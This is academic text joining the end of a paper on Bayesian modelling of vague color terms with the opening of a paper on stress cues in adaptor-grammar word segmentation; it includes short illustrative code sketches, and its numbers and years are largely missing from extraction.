for example, our work explains subjects' decisions as a straightforward reflection of their communicative goals in a probabilistic setting. our measures of availability and applicability can be seen as offering computational interpretations of the gricean maxims of manner and quality (grice, ). however, these particular interpretations don't give rise to implicatures on our model—largely because our rational observer is so inclusive and variable in the descriptions it offers. to show this, we can analyze what an idealized hearer learns about an underlying color x when the speaker uses a color term k: this is p(x | k^said). the model predictions are formalized in the derivation below.
p(x | k^said) = p(x | k^said, k^true)
             = p(k^said, k^true | x) p(x) / p(k^said, k^true)
             = p(k^said | k^true) p(k^true | x) p(x) / (p(k^said | k^true) p(k^true))
             = α_k p(k^true | x) p(x) / (α_k p(k^true))
             = p(x | k^true)

we apply bayes's rule, exploiting our model assumption that the speaker says k only when the speaker first judges that k is true. our model also tells us that, given that k is true, the speaker's choice of whether to say k depends only on the availability α_k of the term k. simplifying, we find that the pragmatic posterior—what we think the speaker was looking at when she said this word—coincides with the semantic posterior—what we think the word is true of. intuitively, the hearer knows that the term is true because the speaker has used the word, independent of the color x the speaker is describing. similarly, in our model of speaker choice, the speaker does not take x into account in choosing one of the applicable words to say (one way the speaker could do this, for example, would be to prefer terms that were more informative about the target color x). instead, the speaker simply samples from the candidates. that's why the speaker's choice reveals only what the semantics says about x.

technically, this makes semantics a nash equilibrium, where the information the hearer recovers from an utterance is exactly the information the speaker intends to express—in keeping with a longstanding tradition in the philosophy of language (lewis, ; cumming, ). by contrast, researchers such as smith et al. ( ) adopt broadly similar formal assumptions but predict asymmetries where sophisticated listeners can second-guess naive speakers' choices and recover "extra" information that the speaker has revealed incidentally and unintentionally. the difference between this approach and ours eventually leads to a difference in the priors over utterances, but it's best explained through the different utilities that motivate speakers' different choices in the first place. smith et al. ( ) assume speakers want to be informative; we assume they want to fit in. the empirical success of our approach on munroe's data motivates a larger project to elicit data that can explicitly probe subjects' communicative goals in relation to semantic coordination.

meanwhile, our work formalizes probabilistic theories of vagueness with new scale and precision. these naturally suggest that we test predictions about the dynamics of conversation drawn from the semantic literature on vagueness. for example, in hearing a description for an object, we come to know more about the standards governing the applicability of the description. this is outlined by barker ( ) as having a meta-semantic effect on the common ground among interlocutors. for example, hearing a yellow-green object called yellowish green should make objects in the same color range more likely to be referred to as yellowish green. we could use lux straightforwardly to represent such conceptual pacts (brennan and clark, ) via a posterior over threshold parameters. it's natural to look for empirical evidence to assess the effectiveness of such representations of dependent context.

a particularly important case involves descriptive material that distinguishes a target referent from salient alternatives, as in the understanding or generation of referring expressions (krahmer and van deemter, ). following kyburg and morreau ( ), we could represent this using lux via a posterior over the threshold parameters that fit the target but exclude its alternatives.
again, our model as- sociates such goals with quantitative measures that future research can explore empirically. meo et al. ( ) present an initial exploration of this idea. these open questions complement the key advan- tage that makes uncertainty about meaning crucial to the success of the model and experiments we have reported here. many kinds of language use seem to be highly variable, and approaches to grounded se- mantics need ways to make room for this variabil- ity both in the semantic representations they learn and the algorithms that induce these representations from language data. we have argued that uncertainty about meaning is a powerful new tool to do this. we look forward to future work addressing uncertainty in grounded meanings in a wide range of continu- ous domains—generalizing from color to quantity, scales, space and time—and pursuing a wide range of reasoning efforts, to corroborate our results and to leverage them in grounded language use. acknowledgments this work was supported in part by nsf dge- . this work has benefited from discus- sion and feedback from the reviewers of tacl, ma- neesh agrawala, david devault, jason eisner, tarek el-gaaly, katrin erk, vicky froyen, joshua gang, pernille hemmer, alex lascarides, and tim meo. references hirotugu akaike. . a new look at the statistical model identification. ieee transactions on automatic control, ( ): – . john r. anderson. . the adaptive nature of human categorization. psychological review, ( ): . jacob andreas and dan klein. . grounding lan- guage with points and paths in continuous spaces. in proceedings of the eighteenth conference on com- putational natural language learning, pages – , june. chris barker. . the dynamics of vagueness. lin- guistics and philosophy, ( ): – . brent berlin. . basic color terms: their univer- sality and evolution. univ of california press. susan e. brennan and herbert h. clark. . concep- tual pacts and lexical choice in conversation. journal of experimental psychology: learning, memory and cognition, ( ): – . stephen p. brooks and andrew gelman. . gen- eral methods for monitoring convergence of iterative simulations. journal of computational and graphical statistics, ( ): – . peter f. brown, vincent j. della pietra, robert l. mercer, stephen a. della pietra, and jennifer c. lai. . an estimate of an upper bound for the entropy of english. computational linguistics, ( ): – . elia bruni, gemma boleda, marco baroni, and nam- khanh tran. . distributional semantics in tech- nicolor. in proceedings of the th annual meeting of the association for computational linguistics, pages – . stanley f. chen and joshua goodman. . an empiri- cal study of smoothing techniques for language model- ing. in proceedings of the th annual meeting on as- sociation for computational linguistics, pages – . david l. chen and raymond j. mooney. . learning to sportscast: a test of grounded language acquisition. in icml ’ : proceedings of the th international conference on machine learning, pages – . siddhartha chib and edward greenberg. . un- derstanding the metropolis–hastings algorithm. the american statistician, ( ): – . jason chuang, maureen stone, and pat hanrahan. . a probabilistic model of the categorical association between colors. in color imaging conference, pages – . sam cumming. . coordination and content. philosophers’ imprint, ( ): – . colin r. dawson, jeremy wright, antons rebguns, marco valenzuela escárcega, daniel fried, and paul r. cohen. . 
a generative probabilis- tic framework for learning spatial language. in ieee third joint international conference on development and learning and epigenetic robotics (icdl), pages – . ieee. david devault, iris oved, and matthew stone. . so- cietal grounding is essential to meaningful language use. in proceedings of the twenty-first national con- ference on artificial intelligence, pages – . mark d. fairchild. . color appearance models. the wiley-is&t series in imaging science and tech- nology. wiley. delia graff fara. . shifting sands: an interest- relative theory of vagueness. philosophical topics, ( ): – . ali farhadi, ian endres, derek hoiem, and david forsyth. . describing objects by their attributes. ieee conference on computer vision and pat- tern recognition, pages – , june. george w. furnas, thomas k. landauer, louis m. gomez, and susan t. dumais. . the vocabulary problem in human-system communication. communi- cations of the acm, ( ): – . peter gärdenfors. . conceptual spaces. mit press. andrew gelman, gareth o. roberts, and walter r. gilks. . efficient metropolis jumping rules. in j. m. bernardo, j. o. berger, a. p. dawid, and a. f. smith, editors, bayesian statistics , pages – . oxford university press. herbert p. grice. . logic and conversation. in p. cole and j. morgan, editors, syntax and semantics iii: speech acts, pages – . academic press. stevan harnad. . the symbol grounding problem. physica d: nonlinear phenomena, ( – ): – . jeffrey heer and maureen stone. . color naming models for color selection, image editing and palette design. in proceedings of the sigchi conference on human factors in computing systems, pages – . john f. hughes, andries van dam, morgan mcguire, david f. sklar, james d. foley, steven k. feiner, and kurt akeley. . computer graphics: principles and practice ( rd edition). addison-wesley profes- sional. gerhard jäger. . natural color categories are con- vex sets. in maria aloni, harald bastiaanse, tikitu de jager, and katrin schulz, editors, logic, language and meaning - th amsterdam colloquium, amster- dam, the netherlands, december - , , re- vised selected papers, volume of lecture notes in computer science, pages – . springer. fred jelinek, robert l. mercer, lalit r. bahl, and james k. baker. . perplexity–a measure of the difficulty of speech recognition tasks. the journal of the acoustical society of america, :s . paul kay, brent berlin, luisa maffi, william r. merri- field, and richard cook. . the world color sur- vey. csli. emiel krahmer and kees van deemter. . compu- tational generation of referring expressions: a survey. computational linguistics, ( ): – . jayant krishnamurthy and thomas kollar. . jointly learning to parse and perceive: connecting natural lan- guage to the physical world. transactions of the asso- ciation for computational linguistics, ( ): – . alice kyburg and michael morreau. . fitting words: vague words in context. linguistics and phi- losophy, ( ): – . johan maurice gisele lammens. . a computational model of color perception and color naming. ph.d. thesis, suny buffalo. staffan larsson. . formal semantics for percep- tual classification. journal of logic and computa- tion. advance online publication. doi: . /log- com/ext . daniel lassiter. . vagueness as probabilistic lin- guistic knowledge. in rick nouwen, robert van rooij, uli sauerland, and hans-christian schmitz, editors, vagueness in communication - international workshop, vic , held as part of esslli , bordeaux, france, july - , . 
revised selected papers, volume of lecture notes in computer science, pages – . springer. david k. lewis. . convention: a philosophical study. harvard university press, cambridge, ma. cynthia matuszek, nicholas fitzgerald, luke zettle- moyer, liefeng bo, and dieter fox. . a joint model of language and perception for grounded at- tribute learning. in proceedings of the th interna- tional conference on machine learning (icml- ), pages – . http://dx.doi.org/ . /logcom/ext http://dx.doi.org/ . /logcom/ext nikolaos mavridis and deb roy. . grounded situation models for robots: where words and per- cepts meet. in intelligent robots and systems, ieee/rsj international conference on, pages – . ieee. timothy meo, brian mcmahan, and matthew stone. . generating and resolving vague color refer- ences. in semdial : the th workshop on the semantics and pragmatics of dialogue, pages – . nicholas metropolis, arianna w. rosenbluth, mar- shall n. rosenbluth, augusta h. teller, and edward teller. . equation of state calculations by fast computing machines. the journal of chemical physics, ( ): – . randall munroe. . color survey results. on- line at http://blog.xkcd.com/ / / /color-survey- results/. kimele persaud and pernille hemmer. . the in- fluence of knowledge and expectations for color on episodic memory. in p bello, m guarini, m mc- shane, and b scassellati, editors, proceedings of the th annual conference of the cognitive science so- ciety, pages – . terry regier, paul kay, and richard s. cook. . fo- cal colors are universal after all. proceedings of the national academy of sciences, : – . terry regier, paul kay, and naveen khetarpal. . color naming reflects optimal partitions of color space. proceedings of the national academy of sci- ences, : – . carina silberer, vittorio ferrari, and mirella lapata. . models of semantic representation with visual attributes. in proceedings of the st annual meet- ing of the association for computational linguistics, pages – . nathaniel j. smith, noah d. goodman, and michael c. frank. . learning and using language via recur- sive pragmatic reasoning about other agents. in ad- vances in neural information processing systems , pages – . stefanie tellex, thomas kollar, and steven dickerson. a. approaching the symbol grounding problem with probabilistic graphical models. ai magazine, ( ): – . stefanie tellex, thomas kollar, steven dickerson, matthew r walter, ashis gopal banerjee, seth j teller, and nicholas roy. b. understanding nat- ural language commands for robotic navigation and mobile manipulation. in proceedings of the twenty- fifth aaai conference on artificial intelligence, pages – . terry winograd. . procedures as a representation for data in a computer program for understanding nat- ural language. ph.d. thesis, mit. peter young, alice lai, micah hodosh, and julia hock- enmaier. . from image descriptions to visual denotations: new similarity metrics for semantic in- ference over event descriptions. transactions of the association for computational linguistics, : – . john m. zelle and raymond j. mooney. . learn- ing to parse database queries using inductive logic pro- gramming. in proceedings of the national conference on artificial intelligence, pages – . luke s. zettlemoyer and michael collins. . learn- ing to map sentences to logical form: structured clas- sification with probabilistic categorial grammars. in uai ’ , proceedings of the st conference in un- certainty in artificial intelligence, pages – . 
introduction related work using vague color terms: a model color categories semantic representation rational observer model learning experiment munroe color corpus fitting the model parameters model evaluation alternative models evaluation metrics decision-based metrics likelihood-based metrics evaluation results discussion and conclusion exploring the role of stress in bayesian word segmentation using adaptor grammars exploring the role of stress in bayesian word segmentation using adaptor grammars benjamin börschinger , mark johnson , department of computing, macquarie university, sydney, australia department of computational linguistics, heidelberg university, heidelberg, germany santa fe institute, santa fe, usa {benjamin.borschinger|mark.johnson}@mq.edu.au abstract stress has long been established as a major cue in word segmentation for english infants. we show that enabling a current state-of-the-art bayesian word segmentation model to take ad- vantage of stress cues noticeably improves its performance. we find that the improvements range from to %, depending on both the use of phonotactic cues and, to a lesser ex- tent, the amount of evidence available to the learner. we also find that in particular early on, stress cues are much more useful for our model than phonotactic cues by themselves, consistent with the finding that children do seem to use stress cues before they use phono- tactic cues. finally, we study how the model’s knowledge about stress patterns evolves over time. we not only find that our model cor- rectly acquires the most frequent patterns rel- atively quickly but also that the unique stress constraint that is at the heart of a previously proposed model does not need to be built in but can be acquired jointly with word segmen- tation. introduction among the first tasks a child language learner has to solve is picking out words from the fluent speech that constitutes its linguistic input. for english, stress has long been claimed to be a useful cue in infant word segmentation (jusczyk et al., ; jusczyk et al., b), following the demonstra- the datasets and software to replicate our experiments are available from http://web.science.mq.edu.au/ ˜bborschi/ tion of its effectiveness in adult speech process- ing (cutler et al., ). several studies have investigated the role of stress in word segmenta- tion using computational models, using both neu- ral network and “algebraic” (as opposed to “statis- tical”) approaches (christiansen et al., ; yang, ; lignos and yang, ; lignos, ; lig- nos, ). bayesian models of word segmenta- tion (brent, ; goldwater, ), however, have until recently completely ignored stress. the sole exception in this respect is doyle and levy ( ) who added stress cues to the bigram model (gold- water et al., ), demonstrating that this leads to an improvement in segmentation performance. in this paper, we extend their work and show how to integrate stress cues into the flexible adaptor gram- mar framework (johnson et al., ). this allows us to both start from a stronger baseline model and to investigate how the role of stress cues interacts with other aspects of the model. in particular, we find that phonotactic cues to word-boundaries inter- act with stress cues, indicating synergistic effects for small inputs and partial redundancy for larger in- puts. overall, we find that stress cues add roughly % token f-score to a model that does not account for phonotactics and % to a model that already in- corporates phonotactics. 
relatedly and in line with the finding that stress cues are used by infants before phonotactic cues (jusczyk et al., a), we observe that phonotactic cues require more input than stress cues to be used efficiently. a closer look at the knowledge acquired by our models shows that the unique stress constraint of yang ( ) can be acquired jointly with segmenting the input instead of having to be pre-specified; and that our models correctly identify the predominant stress pattern of the input but underestimate the frequency of iambic words, which have been found to be missegmented by infant learners. the outline of the paper is as follows. in section we review prior work. in section we introduce our own models. in section we explain our experimental evaluation and its results. section discusses our findings, and section concludes and provides some suggestions for future research.
background and related work
lexical stress is the "accentuation of syllables within words" (cutler, ) and has long been argued to play an important role in adult word recognition. following cutler and carter ( )'s observation that stressed syllables tend to occur at the beginnings of words in english, jusczyk et al. ( ) investigated whether infants acquiring english take advantage of this fact. their study demonstrated that this is indeed the case for month olds, although they found no indication of using stressed syllables as cues for word boundaries in month olds. their findings have been replicated and extended in subsequent work (jusczyk et al., b; thiessen and saffran, ; curtin et al., ; thiessen and saffran, ). a brief summary of the key findings is as follows: english infants treat stressed syllables as cues for the beginnings of words from roughly months of age, suggesting that the role played by stress needs to be acquired, and that this requires antecedent segmentation by non-stress-based means (thiessen and saffran, ). they also exhibit a preference for low-pass filtered stress-initial words from this age, suggesting that it is indeed stress and not other phonetic or phonotactic properties that are treated as a cue for word-beginnings (jusczyk et al., ). in fact, phonotactic cues seem to be used later than stress cues (jusczyk et al., a) and seem to be outweighed by stress cues (mattys and jusczyk, ). the earliest computational model for word segmentation incorporating stress cues we are aware of is the recurrent network model of christiansen et al. ( ) and christiansen and curtin ( ). they only reported a word-token f-score of % (roughly, segmentation accuracy: see section ), which is considerably below the performance of subsequent models, making a direct comparison complicated. yang ( ) introduced a simple incremental algorithm that relies on stress by embodying a unique stress constraint (usc) that allows at most a single stressed syllable per word. on pre-syllabified child directed speech, he reported a word token f-score of . % for a non-statistical algorithm that exploits the usc. while the usc has been argued to be near-to-universal and follows from the "culminative function of stress" (fromkin, ; cutler, ), the high score yang reported crucially depends on every word token carrying stress, including function words.
more recently, lignos ( , , ) further explored yang’s original algorithm, taking into account that function words should not be assumed to possess lexical stress cues. while his scores are in line with those reported by yang, the importance of stress for this learner were more modest, providing a gain of around . % (lignos, ). also, the yang/lignos learner is unable to acquire knowledge about the role stress plays in the language, e.g. that stress tends to fall on particular positions within words. doyle and levy ( ) extend the bigram model of goldwater et al. ( ) by adding stress- templates to the lexical generator. a stress-template indicates how many syllables the word has, and which of these syllables (if any) are stressed. this allows the model to acquire knowledge about the stress patterns of its input by assigning different probabilities to the different stress-templates. how- ever, doyle and levy ( ) do not directly exam- ine the probabilities assigned to the stress-templates; they only report that their model does slightly prefer stress-initial words over the baseline model by cal- culating the fraction of stress-initial word types in the output segmentations of their models. they also demonstrate that stress cues do indeed aid segmen- tation, although their reported gain of % in token f-score is even smaller than that reported by lig- nos ( ). our own approach differs from theirs in assuming phonemic rather than pre-syllabified in- put (although our model could, trivially, be run on syllabified input as well) and makes use of adap- tor grammars instead of the goldwater et al. ( ) bigram model, providing us with a flexible frame- work for exploring the usefulness of stress in differ- ent models. adaptor grammar (johnson et al., ) is a grammar-based formalism for specifying non- parametric hierarchical models. previous work ex- plored the usefulness of, for example, syllable- structure (johnson, b; johnson and goldwa- ter, ) or morphology (johnson, b; johnson, a) in word segmentation. the closest work to our own is johnson and demuth ( ) who investi- gate the usefulness of tones for mandarin phonemic segmentation. their way of adding tones to a model of word segmentation is very similar to our way of incorporating stress. models we give an intuitive description of the mathemati- cal background of adaptor grammars in . , refer- ring the reader to johnson et al. ( ) for technical details. the models we examine are derived from the collocational model of johnson and goldwater ( ) by varying three parameters, resulting in models: two baselines that do not take advantage of stress cues and either do or do not use phonotactics, as described in section . ; and four stress models that differ with respect to the use of phonotactics, and as to whether they embody the unique stress constraint introduced by yang ( ). we describe these models in section . . . adaptor grammars briefly, an adaptor grammar (ag) can be seen as a probabilistic context-free grammar (pcfg) with a special set of adapted non-terminals. we use un- derlining to distinguish adapted non-terminals ( x ) from non-adapted non-terminals ( y ). the distri- bution for each adapted non-terminal x is drawn from a pitman-yor process which takes as its base- distribution the tree-distribution over trees rooted in x as defined by the pcfg. 
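the reuse behaviour induced by this pitman-yor draw can be illustrated with a small simulation. the sketch below shows only the predictive rule of a pitman-yor process over a toy base distribution; the vocabulary, discount and concentration values are invented and are not the grammars or samplers used in the paper.

```python
import random
from collections import Counter

def pitman_yor_samples(base_sample, n, discount=0.5, concentration=1.0):
    """Draw n items from a Pitman-Yor process over the given base distribution.

    An existing cached item is reused with probability proportional to
    (its count - discount); a fresh item is generated from the base
    distribution with probability proportional to
    (concentration + discount * number_of_cached_items).
    """
    cache = []      # list of [item, count] pairs, one per cached item
    samples = []
    for _ in range(n):
        weights = [count - discount for _, count in cache]
        weights.append(concentration + discount * len(cache))  # new item
        r = random.uniform(0.0, sum(weights))
        acc, j = 0.0, 0
        for j, w in enumerate(weights):
            acc += w
            if r <= acc:
                break
        if j == len(cache):              # generate from the base distribution
            cache.append([base_sample(), 1])
        else:                            # reuse a cached item
            cache[j][1] += 1
        samples.append(cache[j][0])
    return samples

# toy base distribution over candidate "words" (made-up phoneme strings)
vocab = ["yu", "want", "tu", "si", "d@", "bUk"]
random.seed(0)
draws = pitman_yor_samples(lambda: random.choice(vocab), 200)
print(Counter(draws).most_common())   # a few items dominate
```

the printed counts are dominated by a handful of items: the more often an item has been generated, the more likely it is to be generated again, which is the cache-and-reuse dynamics described next.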
as an effect, each adapted non-terminal can be seen as having associ- ated with it a cache of previously-generated subtrees that can be reused without having to be regenerated using the individual pcfg rules. this allows ags to learn reusable sub-trees such as words, sequences of words, or smaller units such as onsets and codas. thus, while ordinary pcfgs have a finite number of parameters (one probability for each rule), adap- tor grammars in addition have a parameter for every possible complete tree rooted in any of its adapted non-terminals, leading to a potentially infinite num- ber of such parameters. the pitman-yor process in- duces a rich-get-richer dynamics, biasing the model towards identifying a small set of units that can be reused as often as possible. in the case of word seg- mentation, the model will try to identify as compact a lexicon as possible to segment the unsegmented input. . baseline models our starting point is the state-of-the-art ag model for word segmentation, johnson and goldwater ( )’s colloc -syll model, reproduced in fig- ure . the model assumes that words are grouped into larger collocational units that themselves can be grouped into even larger collocational units. this accounts for the fact that in natural language, there are strong word-to-word dependencies that need to be accounted for if severe undersegmentations of the form “is in the” are to be avoided (goldwater, ; johnson and goldwater, ; börschinger et al., ). it also uses a language-independent form of syllable structure to constrain the space of possi- ble words. finally, this model can learn word-initial onsets and word-final codas. in a language like en- glish, this ability provides additional cues to word- boundaries as certain onsets are much more likely to occur word-initially than medially (e.g. “bl” in “black”), and analogously for certain codas (e.g. “dth” in “width” or “ngth” in “strength”). we define an additional baseline model by replac- ing rules ( ) and ( ) by ( ), and deleting rules ( ) to ( ). this removes the model’s ability to use phono- tactic cues to word-boundaries. word → syll ( syll ) ( syll ) ( syll ) ( ) we refer to the model in figure as the colloc - phon model, and the model that results from sub- stituting and removing rules as described as the colloc -nophon model. alternatively, one could limit the models ability to capture word-to-word de- pendencies by removing rules ( ) to ( ). this results we follow johnson and goldwater ( ) in limiting the length of possible words to four syllables to speed up runtime. in pilot experiments, this choice did not have a noticeable effect on segmentation performance. collocations → collocation + ( ) collocation → collocation + ( ) collocation → collocation + ( ) collocation → word + ( ) word → syllif ( ) word → sylli ( syll ) ( syll ) syllf ( ) syllif → ( onseti ) rhymef ( ) sylli → ( onseti ) rhyme ( ) syllf → ( onset ) rhymef ( ) codaf → consonant + ( ) rhymef → vowel ( codaf ) ( ) onseti → consonant + ( ) syll → ( onset ) rhyme ( ) rhyme → vowel ( coda ) ( ) onset → consonant + ( ) coda → consonant + ( ) figure : the baseline model. we use regular-expression notation to abbreviate multiple rules. x{n} stands for up to n repetitions of x , brackets indicate optionality, and x + stands for one or more repetitions of x . x indicates an adapted non-terminal. rules that introduce terminals for the pre-terminals vowel , consonant are omitted. refer to the main text for an explanation of the grammar. 
in the colloc-model (johnson, b) that has previ- ously been found to behave similarly to the bigram model used in doyle and levy ( ) (johnson, b; börschinger et al., ). we performed ex- periments with the colloc-model as well and found similar results to doyle and levy ( ) which are, while overall worse, similar in trend to the results obtained for the colloc -models. for the rest of the paper, therefore, we will focus on variants of the colloc -model. . stress-based models in order for stress cues to be helpful, the model must have some way of associating the position of stress with word-boundaries. intuitively, the reason stress helps infants in segmenting english is that a stressed syllable is a reliable indicator of the beginning of a word (jusczyk et al., ). more generally, if there is a (reasonably) reliable relationship between the position of stressed syllables and beginnings (or word →{ssyll | usyll}{ , } ( ) ssyll → ( onset ) rhymes ( ) usyll → ( onset ) rhymeu ( ) rhymes → vowel ∗( coda ) ( ) rhymeu → vowel ( coda ) ( ) onset → consonant + ( ) coda → consonant + ( ) figure : description of the all-stress-patterns model. we use x{m,n} for “at least m and at most n repetitions of x ” and {x | y} for “either x or y ”. stress is asso- ciated with a vowel by suffixing it with the special termi- nal symbol ∗ , leading to a distinction between stressed ( ssyll ) and unstressed ( usyll ) syllables. a word can consist of any possible sequence of up to four syllables, as indicated by the regular-expression notation. by ad- ditionally adding initial and final variants of ssyll and usyll as in figure , phonotactics can be combined with stress cues. endings) of words, a learner might exploit this rela- tionship. in a bayesian model, this intuition can be captured by modifying the lexical generator, that is, the distribution that generates word s. here, changing the lexical generator corresponds to modifying the rules expanding word . a straight- forward way to modify it accordingly is to enu- merate all possible sequences of stressed and un- stressed syllables. a lexical generator like this is given in figure . in the data, stress cues are rep- resented using a special terminal “∗” that follows a stressed vowel, as illustrated in figure . in the grammar, “∗” is constrained to only surface follow- ing a vowel , rendering a syllable in which it occurs stressed ( ssyll ). syllables that do not contain a “∗” are considered unstressed ( usyll ). by performing inference for the probabilities assigned to the dif- ferent expansions of rule ( ), our models can, for example, learn that a bi-syllabic word that is stress- initial (a trochee) is more probable than one that puts stress on the second syllable (an iamb). this (partly) captures the tendency of english for stress-initial words and thus provide an additional cue for identi- fying words; and it is exactly the kind of preference infant learners of english seem to acquire (jusczyk this is, in essence, also the strategy chosen by doyle and levy ( ). grammar phon stress usc colloc -nophon colloc -phon • colloc -nophon-stress • colloc -phon-stress • • colloc -nophon-stress-usc • • colloc -phon-stress-usc • • • table : the different models used in our experiments. “phon” indicates whether phonotactics are used, “stress” whether stress cues are used and “usc” whether the unique stress constraint is assumed. orthographic the do-gie no-stress dh ah d ao g iy stress dh ah d ao * g iy figure : illustration of the input-representation we choose. 
we indicate primary stress according to the dic- tionary with bold-face in the orthography. the phonemic transcription uses arpabet and is produced using an extended version of cmudict. primary stress is indi- cated by inserting the special symbol “*” after the vowel of a stressed syllable. et al., ). we can combine this lexical generator with the colloc -nophon baseline, resulting in the colloc - nophon-stress model. we can also add phonotac- tics to the lexical generator in figure by adding initial and final variants of ssyll and usyll , anal- ogous to rules ( ) to ( ) in figure . this yields the colloc -phon-stress model. we can also add the unique stress constraint (usc) (yang, ) by excluding all variants of rule ( ) that generate two or more stressed syllables. for example, while the lexical generator for the colloc -nophon-stress model will include the rule word → ssyll ssyll , the lexical generator embodying the usc lacks this rule. we refer to the models that include the usc as colloc -nophon-stress-usc and colloc -phon-stress- usc models. a compact overview of the six different models is given in table . experiments we evaluate our models on several corpora of child directed speech. we first describe the corpora we used, then the experimental methodology employed and finally the experimental results. as the trend is comparable across all corpora, we only discuss in detail results obtained on the alex corpus. for com- pleteness, however, table reports the “standard” evaluation of performing inference over all of the three corpora. . corpora and corpus creation following christiansen et al. ( ) and doyle and levy ( ), we use the korman corpus (korman, ) as one of our corpora. it comprises child- directed speech for very young infants, aged be- tween and weeks and, like all other cor- pora used in this paper, is available through the childes database (macwhinney, ). we de- rive a phonemicized version of the corpus using an extended version of cmudict (carnegie mellon university, ) , as we were unable to obtain the stress-annotated version of this corpus used in previ- ous experiments. the phonemicized version is pro- duced by replacing each orthographic word in the transcript with the first pronunciation given by the dictionary. cmudict also annotates lexical stress, and we use this information to add stress cues to the corpus. we only code primary lexical stresses in the input, ignoring secondary stresses in line with ex- perimental work that indicates that human listeners are capable of reliably distinguishing primary and secondary stress (mattys, ). due to the very low frequency of words with or more syllables in these corpora, this choice has very little effect on the number of stress cues available in the input. our ver- sion of the korman corpus contains, in total, utterances. unlike christiansen et al. ( ), yang ( ), and doyle and levy ( ), we follow lig- nos and yang ( ) in making the more realistic as- sumption that the mono-syllabic function words listed by selkirk ( ) never surface with lexical stress. as function words account for roughly % of the tokens but only roughly % of the types in our corpora, this means that the type and token distribu- tion of stress patterns differs dramatically in all our corpora, as can be seen from table . we also added stress information to the brent- bernstein-ratner corpus (bernstein-ratner, ; brent, ), following the procedure just out- lined. 
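the corpus-creation procedure just outlined can be sketched as follows. the pronunciation dictionary and function-word list below are tiny invented stand-ins for the extended cmudict and the selkirk function-word list actually used; the output for "the doggie" matches the stress-marked representation illustrated in figure .

```python
# Toy stand-in pronunciation dictionary: ARPAbet-like phonemes plus the
# index of the vowel carrying primary stress.  The real experiments use an
# extended CMUdict; these entries are illustrative only.
PRON = {
    "the":    (["dh", "ah"], 1),
    "doggie": (["d", "ao", "g", "iy"], 1),
    "you":    (["y", "uw"], 1),
    "see":    (["s", "iy"], 1),
}

# Abbreviated stand-in for the mono-syllabic function-word list:
FUNCTION_WORDS = {"the", "a", "you", "of", "to"}

def stress_annotate(utterance):
    """Convert an orthographic utterance into a phonemic, stress-marked form.

    Primary stress is coded by inserting '*' after the stressed vowel;
    secondary stress is ignored, and mono-syllabic function words are
    left unstressed.
    """
    out = []
    for word in utterance.lower().split():
        phones, stress_idx = PRON[word]
        phones = list(phones)
        if word not in FUNCTION_WORDS:
            phones.insert(stress_idx + 1, "*")
        out.append(" ".join(phones))
    return " ".join(out)

print(stress_annotate("the doggie"))   # -> dh ah d ao * g iy
print(stress_annotate("you see"))      # -> y uw s iy *
```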
this corpus is a de-facto standard for evaluat- http://svn.code.sf.net/p/cmusphinx/ code/trunk/cmudict/cmudict. . a pattern brent korman alex tok typ tok typ tok typ w+ . . . . . . sw∗ . . . . . . wsw∗ . . . . . . other . . . . . . table : relative frequencies for stress patterns for the corpora used in our study. x∗ stands for or more, x+ for one or more repetitions of x, and s for a stressed and w for an unstressed syllable. note the stark asymmetry between type and token frequencies for unstressed words. up to two-decimal places, patterns other than the ones given have relative frequency . (frequencies might not sum to as an artefact of rounding to decimal places). ing models of bayesian word segmentation (brent, ; goldwater, ; goldwater et al., ; johnson and goldwater, ), comprising in total utterances. as our third corpus, we use the alex portion of the providence corpus (demuth et al., ; börschinger et al., ). a major benefit of the providence corpus is that the video-recordings from which the transcripts were produced are available through childes alongside the transcripts. this will allow future work to rely on even more realis- tic stress cues that can be derived directly from the acoustic signal. while beyond the scope of this pa- per, we believe choosing a corpus that makes richer information available will be important for future work on stress (and other acoustic) cues. another major benefit of the alex corpus is that it provides longitudinal data for a single infant, rather than be- ing a concatenation of transcripts collected from multiple children, such as the korman and the brent- bernstein-ratner corpus. in total, the alex corpus comprises utterances. note that despite the differences in age of the in- fants and overall make-up of the corpora, the dis- tribution of stress patterns across the corpora is roughly the same, as shown by table for the first , utterances of each of the corpora. this sug- gests that the distribution of stress patterns both at a token and type level is a robust property of english child-directed speech. . evaluation procedure the aim of our experiments is to understand the contribution of stress cues to the bayesian word segmentation models described in section . to get an idea of how input size interacts with this, we look at prefixes of the corpora with increasing sizes ( , , , , , , and , utterances). in addition, we are interested in under- standing what kind of stress pattern preferences our models acquire. for this, we also collect samples of the probabilities assigned to the different expansions of rule ( ), allowing us to examine this directly. the standard evaluation of segmentation models in- volves having them segment their input in an un- supervised manner and evaluating performance on how well they segmented that input. we addition- ally evaluate the models on a test set for each cor- pus. use of a separate test set has previously been suggested as a means of testing how well the knowl- edge a learner acquired generalizes to novel utter- ances (pearl et al., ), and is required for the kind of comparison across different sizes of input we are interested in to determine whether there the role of stress cues interacts with the input size. we create the test-sets by taking the final ut- terances for each corpus. these utterances will be segmented by the model after it has performed inference on its input, without making any further changes to the lexicon that the model has induced. 
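the held-out utterances are then scored with the token-level metric described below; a straightforward reference implementation of token precision, recall and f-score (not the authors' evaluation code) is the following sketch.

```python
def token_spans(segmented):
    """Return the set of (start, end) character spans of the words in a
    space-segmented utterance, computed over the unsegmented string."""
    spans, pos = set(), 0
    for word in segmented.split():
        spans.add((pos, pos + len(word)))
        pos += len(word)
    return spans

def token_prf(predicted, gold):
    """Token precision, recall and F-score for one segmented utterance."""
    p_spans, g_spans = token_spans(predicted), token_spans(gold)
    correct = len(p_spans & g_spans)
    precision = correct / len(p_spans) if p_spans else 0.0
    recall = correct / len(g_spans) if g_spans else 0.0
    f = (2 * precision * recall / (precision + recall)
         if precision + recall else 0.0)
    return precision, recall, f

# the worked example discussed just below: gold "the dog", predicted "th e dog"
print(token_prf("th e dog", "the dog"))   # (0.333..., 0.5, 0.4)
```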
in other words, the model will have to segment each of the test utterances using only the lexicon (and any additional knowledge about co-occurrences, phono- tactics, and stress) it has acquired from the training portion of the corpus during inference. we measure segmentation performance using the standard metric of token f-score (brent, ) which is the harmonic mean of token precision and recall. token f-score provides an overall impression of how accurate individual word tokens were identified. to illustrate, if the gold segmentation is “the dog”, the segmentation “th e dog” has a token precision of (one out of three predicted words is correct); a token recall of (one of the two gold words was correctly identified); and a token f-score of . . . inference for inference, we closely follow johnson and gold- water ( ): we put vague priors on all the hyper- p s usc alex korman brent train test train test train test . . . . . . • . . . . . . • . . . . . . • • . . . . . . • • . . . . . . • • • . . . . . . table : token f-scores on both train and test portions for all three corpora when inference is performed over the full corpus. note that the benefit of stress is clearer when evaluating on the test set, and that overall, perfor- mance of the different models is comparable across all three corpora. models are coded according to the key in table . parameters of our models and run chains for iterations, collecting samples from each chain with 